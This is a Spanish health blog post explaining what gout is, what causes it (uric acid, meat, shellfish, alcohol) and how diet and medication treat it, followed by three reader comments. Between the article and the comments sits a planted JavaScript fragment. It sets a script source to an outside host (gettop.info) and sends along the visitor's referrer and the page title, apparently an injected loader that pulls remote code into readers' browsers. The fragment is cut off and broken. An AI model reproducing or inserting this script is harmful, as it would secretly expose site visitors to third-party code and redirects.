Salud y belleza » Dieta, Dolores, Enfermedades, Salud

Cómo tratar la gota

3 Comentarios

La gota es una dolencia derivada de la artritis que provoca un dolor intenso e inflamación en las articulaciones. Normalmente el dolor de la gota se puede presentar en el dedo gordo del pie, en la rodilla, en el tobillo, en el codo o en otras articulaciones. En este artículo intentaremos descifrarte las formas en las que puedes tratar esta dolencia.

gota-rodilla

Los dolores de la gota son repentinos y muy intensos. Se producen por la acumulación de ácido úrico en la corriente sanguínea que se queda en las articulaciones, provocando inflamación y dolor. Todo ello lo causa, sobre todo, un exceso de comidas, sobre todo si la dieta tiene demasiadas purinas. El exceso de carne, marisco o de alcohol son algunos factores que pueden provocarla.

gota-pieDiversas dolencias derivadas de la artritis se dan de forma más pausada, pero la gota se caracteriza porque llega el dolor de forma intensa y repentina y si se sacara líquido de la zona dolorida se apreciaría con el microscopio un alto contenido de ácido úrico.

Con la ayuda de medicamentos esta dolencia podría irse en semanas pero si se toman los específicos en un par de días desaparecería el dolor. Por otro lado, la dieta es muy importante a la hora de tratar la gota. Hay que intentar bajar la cantidad de ácido úrico en el cuerpo para que se eliminen los restos de esta sustancia que se han acumulado en las articulaciones. Por ello si padeces la gota evita comer en exceso carnes, marisco y alcohol. También puede ayudar a prevenir la gota beber mucha agua porque ayuda a depurar el cuerpo. Lo importante es prevenir antes que curar, así que procura llevar una dieta equilibrada para mantener alejadas las enfermedades y dolencias.

¿Has tenido alguna vez la gota? ¿Has sentido mucho dolor?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; }

Más consejos de salud y belleza : , , ,

3 Comments »

  • Malak said:

    Pues yo de pequeño he sufrido mucho ese dolor, y el medido me mando muchos medicamentos, y no recuerdo, porque iba con mi madre.

    Ahora llevo 15 años que no me ha vuelto a ocurrir. En su tiempo me ocurría mas en invierno cuando entra el frio.

  • Yolanda said:

    Yo tengo dolores repentinos en las muñecas, pero tengo 20 años. Yo siempre digo que es por falta de calcio que me duelen los huesos pero tras leer este artículo me he quedado en la duda. ¿Qué opináis?

  • Pablo said:

    Hola Yolanda, discúlpame, pero eso solo te lo puede decir un médico.Saludos desde Argentina.Pablo.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.